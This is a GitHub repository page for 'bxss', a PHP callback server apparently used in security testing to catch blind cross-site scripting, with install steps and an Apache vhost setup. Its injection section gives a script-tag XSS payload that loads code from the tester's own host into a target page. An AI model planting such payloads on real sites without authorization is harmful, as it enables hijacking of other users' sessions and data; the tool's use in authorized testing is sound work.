Skip to content

zyrgo/bxss

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

17 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

bxss

My alternative to XSS Hunter for blind XSS.

php badge MIT license badge twitter badge


Install

git clone https://github.com/gwen001/bxss

The web user should have write access on the directory images.

Apache

Using Apache, you can easily configure a vhost like this:

<IfModule mod_ssl.c>
<VirtualHost *:443>
	ServerName x.example.com
	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html/bxss/
	SSLCertificateFile /etc/letsencrypt/live/x.example.com/fullchain.pem
	SSLCertificateKeyFile /etc/letsencrypt/live/x.example.com/privkey.pem
</VirtualHost>
</IfModule>

<VirtualHost *:80>
	ServerName x.example.com
	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html/bxss/
</VirtualHost>

Injection

As soon as the script is available online, you can use your favorite XSS payload:

<script src=http://x.example.com></script>


Feel free to open an issue if you have any problem with the script.

About

Alternative to XSS Hunter for blind XSS.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages

  • PHP 100.0%